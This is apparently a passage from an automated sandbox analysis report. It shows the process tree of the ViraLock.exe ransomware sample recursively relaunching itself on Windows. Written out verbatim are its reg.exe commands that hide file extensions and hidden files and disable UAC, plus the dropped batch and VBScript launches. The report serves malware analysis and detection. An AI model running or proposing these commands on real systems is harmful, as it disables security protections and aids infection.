        System Location Discovery: System Language Discovery
        
        PID:5024
      - C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        6⤵
        
        PID:3036
      - C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        6⤵
        
        PID:2768
      - C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        6⤵
        
        PID:632
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GGQwsMkQ.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        6⤵
        
        PID:3404
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        7⤵
        
        PID:932
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
      4⤵
      Modifies visibility of file extensions in Explorer
      PID:2120
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
      4⤵
      PID:4564
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
      4⤵
      UAC bypass
      PID:408
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qkUMkQEE.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
      4⤵
      PID:1924
    - - C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        5⤵
        
        PID:1352
- - C:\Users\Admin\Downloads\ViraLock.exe
    "C:\Users\Admin\Downloads\ViraLock.exe"
    3⤵
    - Executes dropped EXE
    PID:3148
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
      4⤵
      PID:2264
    - - C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        5⤵
        Executes dropped EXE
        
        PID:4548
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        6⤵
        
        PID:5224
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        7⤵
        Executes dropped EXE
        
        PID:5300
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        8⤵
        
        PID:5828
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        9⤵
        Executes dropped EXE
        
        PID:5908
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        10⤵
        
        PID:5212
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        11⤵
        Executes dropped EXE
        
        PID:5272
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        12⤵
        
        PID:5820
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        13⤵
        Executes dropped EXE
        
        PID:5344
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        14⤵
        
        PID:6072
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        15⤵
        Executes dropped EXE
        
        PID:3352
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        16⤵
        
        PID:5460
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        17⤵
        Executes dropped EXE
        
        PID:5280
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        18⤵
        
        PID:5780
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        19⤵
        
        PID:5700
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        19⤵
        Executes dropped EXE
        
        PID:5604
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        20⤵
        
        PID:5568
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        21⤵
        Executes dropped EXE
        
        PID:1092
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        22⤵
        
        PID:5180
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        23⤵
        Executes dropped EXE
        
        PID:5732
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        24⤵
        
        PID:5384
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        25⤵
        Executes dropped EXE
        
        PID:6076
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        26⤵
        
        PID:6100
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        27⤵
        Executes dropped EXE
        
        PID:4228
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        28⤵
        
        PID:4912
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        29⤵
        
        PID:6060
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        30⤵
        
        PID:5720
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        31⤵
        
        PID:5596
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        32⤵
        
        PID:5212
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        33⤵
        
        PID:1980
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        34⤵
        
        PID:3804
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        35⤵
        
        PID:5184
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        36⤵
        
        PID:5808
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        37⤵
        
        PID:5348
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        38⤵
        
        PID:5608
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        39⤵
        
        PID:6100
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        40⤵
        
        PID:5544
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        41⤵
        
        PID:5176
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        42⤵
        
        PID:5420
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        43⤵
        
        PID:5748
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        44⤵
        
        PID:5848
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        45⤵
        System Location Discovery: System Language Discovery
        
        PID:5764
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        46⤵
        
        PID:5476
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        47⤵
        
        PID:632
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        48⤵
        
        PID:5948
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        49⤵
        
        PID:5880
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        50⤵
        
        PID:5028
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        51⤵
        
        PID:5432
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        52⤵
        
        PID:5576
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        53⤵
        
        PID:5920
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        53⤵
        
        PID:5360
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        54⤵
        System Location Discovery: System Language Discovery
        
        PID:5560
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        55⤵
        
        PID:6140
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        56⤵
        
        PID:5156
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        57⤵
        
        PID:5736
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        58⤵
        
        PID:480
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        59⤵
        System Location Discovery: System Language Discovery
        
        PID:6032
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        60⤵
        
        PID:8
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        61⤵
        
        PID:6048
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        62⤵
        
        PID:5684
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        63⤵
        
        PID:5096
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        63⤵
        
        PID:5644
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        64⤵
        System Location Discovery: System Language Discovery
        
        PID:5660
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        65⤵
        
        PID:5208
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        66⤵
        
        PID:5968
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        67⤵
        
        PID:5448
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        68⤵
        
        PID:3356
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        69⤵
        
        PID:5964
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        69⤵
        
        PID:5564
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        70⤵
        
        PID:5972
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        71⤵
        
        PID:5676
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        72⤵
        
        PID:1276
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        73⤵
        
        PID:5864
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        74⤵
        
        PID:5800
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        75⤵
        
        PID:2840
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        75⤵
        
        PID:5936
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        76⤵
        
        PID:2168
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        77⤵
        
        PID:5684
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        78⤵
        
        PID:5004
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        79⤵
        
        PID:3128
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        80⤵
        
        PID:5232
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        81⤵
        
        PID:6096
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        81⤵
        
        PID:5132
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        82⤵
        
        PID:4932
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        83⤵
        System Location Discovery: System Language Discovery
        
        PID:5164
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        84⤵
        
        PID:8
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        85⤵
        
        PID:5564
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        86⤵
        System Location Discovery: System Language Discovery
        
        PID:5736
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        87⤵
        
        PID:2840
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        88⤵
        
        PID:2992
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        89⤵
        
        PID:5748
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        89⤵
        
        PID:408
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        90⤵
        
        PID:5940
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        91⤵
        
        PID:932
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        92⤵
        
        PID:5424
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        93⤵
        
        PID:5708
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        93⤵
        
        PID:5328
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        94⤵
        
        PID:5680
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        95⤵
        
        PID:5716
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        96⤵
        
        PID:5936
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        97⤵
        
        PID:312
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        98⤵
        
        PID:2840
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        99⤵
        
        PID:5956
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        100⤵
        
        PID:4440
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        101⤵
        
        PID:5180
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        100⤵
        
        PID:3128
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        100⤵
        
        PID:6108
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        100⤵
        UAC bypass
        
        PID:4228
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\fIsMQUIM.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        100⤵
        
        PID:1924
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        98⤵
        
        PID:6080
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        98⤵
        
        PID:5608
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        99⤵
        
        PID:5328
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        98⤵
        UAC bypass
        
        PID:5360
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\PUEosIAc.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        98⤵
        
        PID:5272
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        99⤵
        
        PID:6048
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        96⤵
        Modifies visibility of file extensions in Explorer
        
        PID:4104
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        96⤵
        
        PID:5300
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        96⤵
        UAC bypass
        
        PID:5784
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        97⤵
        
        PID:6072
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pgIAwYUI.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        96⤵
        
        PID:3108
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        97⤵
        
        PID:5212
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        94⤵
        Modifies visibility of file extensions in Explorer
        
        PID:5924
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        95⤵
        
        PID:5400
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        94⤵
        
        PID:2180
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        95⤵
        
        PID:5516
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        94⤵
        
        PID:1068
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KMQAsgAQ.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        94⤵
        
        PID:3216
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        95⤵
        
        PID:5384
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        95⤵
        
        PID:5204
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        92⤵
        
        PID:5232
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        92⤵
        
        PID:5840
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        92⤵
        
        PID:5548
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\OoQMsEYw.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        92⤵
        System Location Discovery: System Language Discovery
        
        PID:6040
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        93⤵
        
        PID:5740
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        93⤵
        
        PID:5192
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        90⤵
        
        PID:4076
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        91⤵
        
        PID:5828
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        90⤵
        
        PID:5220
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        91⤵
        
        PID:5248
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        90⤵
        
        PID:5172
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\osYUAAIQ.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        90⤵
        System Location Discovery: System Language Discovery
        
        PID:4120
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        91⤵
        
        PID:3124
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        88⤵
        Modifies visibility of file extensions in Explorer
        
        PID:5916
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        88⤵
        Modifies registry key
        
        PID:1444
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        89⤵
        
        PID:5124
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        88⤵
        
        PID:3404
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\okwQQoog.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        88⤵
        
        PID:4548
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        89⤵
        
        PID:5236
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        86⤵
        Modifies visibility of file extensions in Explorer
        
        PID:5832
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        86⤵
        
        PID:5396
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        86⤵
        Modifies registry key
        
        PID:5852
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\fOsIEosU.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        86⤵
        
        PID:3352
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        87⤵
        
        PID:5868
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        84⤵
        
        PID:5812
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        84⤵
        
        PID:5880
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        84⤵
        
        PID:5844
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FiQAMkUc.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        84⤵
        
        PID:5808
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        85⤵
        
        PID:932
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        82⤵
        Modifies registry key
        
        PID:3568
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        82⤵
        
        PID:5188
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        83⤵
        
        PID:1188
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        82⤵
        
        PID:4540
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eWcoswgw.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        82⤵
        
        PID:3216
        
        C:\Windows\SysWOW64\cscript.exe
        
